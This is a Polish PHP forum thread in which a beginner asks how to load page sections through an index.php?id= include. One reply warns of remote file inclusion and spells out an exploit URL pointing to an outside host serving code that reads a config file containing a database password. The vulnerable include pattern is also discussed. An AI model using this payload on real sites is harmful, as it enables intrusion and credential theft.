![]() |
![]() ![]() |
![]() |
![]() ![]()
|
|
Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 18.06.2007 Ostrzeżenie: (0%) ![]() ![]() |
Mam wielki problem! Robie strone o grze i chce zastosować linki index.php?id=test no i zrobiłem tam gdzie się ma wyświetlać zawartość działu czyli pośrodku kod php wstawiłem
To include show_news.php to żeby na stronie głównej się newsy wyświetlały. No i jak wchodze w link index.php?id=test to otwiera mi się zawartość działu test nad newsami ![]() Tutaj macie strone www.simsportal.yoyo.pl na yoyo bo narazie w budowie. No i wejdźcie w dział kontakt. I tam wlasnie jest link ndex.php?id=test w kontakt i zobaczcie jak to działa.. Jak zrobić żeby sie newsy nie pokazywały w linku ndex.php?id=test. I jeszcze co zrobić że jak wejde w link np index.php?id=bleble to żeby sie wyświetlało że błąd wyskoczyl ze nie ma takiego pliku. CHodzi mi oto żeby w środku dział się wyświetlał że nie ma takiego pliku. Ten post edytował E-Kukis 18.06.2007, 10:59:06 |
|
|
![]()
|
|
![]() Grupa: Zarejestrowani Postów: 662 Pomógł: 45 Dołączył: 26.03.2007 Skąd: Warszawa Ostrzeżenie: (0%) ![]() ![]() |
lub
Ten post edytował Moli 18.06.2007, 10:39:27 |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 18.06.2007 Ostrzeżenie: (0%) ![]() ![]() |
Ale ten kod co dałeś pokaże że jak tego pliku nie ma otworzy show_news.php?
Ohhh działa!! Dzięki!! A jeszcze powie mi ktoś jak zrobić że jak nie ma takiego pliku utworzy sie np. blad.php?? |
|
|
![]()
|
|
![]() Grupa: Zarejestrowani Postów: 219 Pomógł: 5 Dołączył: 18.07.2006 Skąd: Piekary Śląskie Ostrzeżenie: (0%) ![]() ![]() |
Hmm. To ja może polecę taka stronę: www.php.net . Szczególnie polecam dział documentation. Myślę, że sporo rzeczy się wyjaśni.
-------------------- CMS dla Twojej firmy
Wojciech Małota |
|
|
![]()
|
|
Niestety nic z tej strony nie kapuje. Teraz próboje dać taki kod żeby zrobić kilka linków np test.php forum.php itp. No i żeby tylko na stronie głównej się newsy wyświetlały. Tak jak wcześniej. I chce dać taki kod:
I wywala błędy. Co zrobić? |
|
|
![]()
|
|
![]() Grupa: Zarejestrowani Postów: 504 Pomógł: 2 Dołączył: 31.03.2006 Skąd: Londyn Ostrzeżenie: (0%) ![]() ![]() |
Przede wszystkim przeczytac jakis kurs PHP dla poczatkujacych, napewno wyjasni to wiecej niz propozycja cicika
![]() Co do kodu to jak przeczytasz kurs to na pewno stanie sie jasne co i jak.
Ten post edytował thornag 18.06.2007, 11:33:15 -------------------- "Wizja czasu jest szeroka, lecz kiedy sie przez nia przechodzi, czas staje sie waskimi drzwiami"
![]() |
|
|
![]()
|
|
![]() Grupa: Zarejestrowani Postów: 219 Pomógł: 5 Dołączył: 18.07.2006 Skąd: Piekary Śląskie Ostrzeżenie: (0%) ![]() ![]() |
Niestety nic z tej strony nie kapuje. Niestety żeby zacząć pisać jakieś programy najpierw trzeba troszkę poczytać. Faktycznie może jakiś kurs dla początkujących będzie lepszy na początek. -------------------- CMS dla Twojej firmy
Wojciech Małota |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 19.06.2007 Ostrzeżenie: (0%) ![]() ![]() |
robidz 1 plik *.php (najlepiej index.php) z cala szata graficzna itp. tam gdzie ma byc tresc dajesz:
skrypt dziala tak robisz pliki html (lub php wtedy html zamieniasz na php) dajesz w nim jaks tresc np. robisz plik lalala.html i wpisujesz w nim lalalala... robisz link: i jak go klinkniesz to w miejscu tamtego skryptu bedzie text lalalal... bo taka jest zawartosc pliku lalala.html ![]() plik main.html to jest domyslny plik jako jego zawartosc daj newsy ![]() posta pisalem na szybko wiec moga byc bledy ortograficzne i logiczne za ktore przepraszam ![]() |
|
|
![]()
|
|
I jeszcze umieść na serwerze plik konfiguracyjny z hasłem do bazy danych. Nazwij go np. konfig.xml.
Wtedy ja otworzę u Ciebie stronę index.php?id=http://www.php-art.pl/hack I na serwerze www.php-art.pl umieszcze plik hack.html o treści: <?php readfile('konfig.xml'); ?> Jak myślisz, co się pokaże? Co prawda Twój serwer musi być odpowiednio skonfigurowany żeby to działało ale przy domyslnej konfiguracji tak właśnie jest. -------------------- CMS dla Twojej firmy
Wojciech Małota |
|
|
![]()
|
|
Grupa: Zarejestrowani Postów: 3 Pomógł: 0 Dołączył: 19.06.2007 Ostrzeżenie: (0%) ![]() ![]() |
wyszedlem z zalozenie ze nie trzyma zadnych tajnych plikow
![]() teraz nie mam juz dostepu do kompa ale jak wroce napisze jak mozna zabezpieczyc ten plik ![]() zrobie to za jakies 3-4h ![]() ---edit--- troche z opoznieniem ale ![]()
znowu moze byc blad ale imo to juz jest swego rodzaju zabezpieczenie ![]() ![]() Ten post edytował SunSet 19.06.2007, 12:10:54 |
|
|
![]() ![]() |
![]() |
Wersja Lo-Fi | Aktualny czas: 18.06.2025 - 22:55 |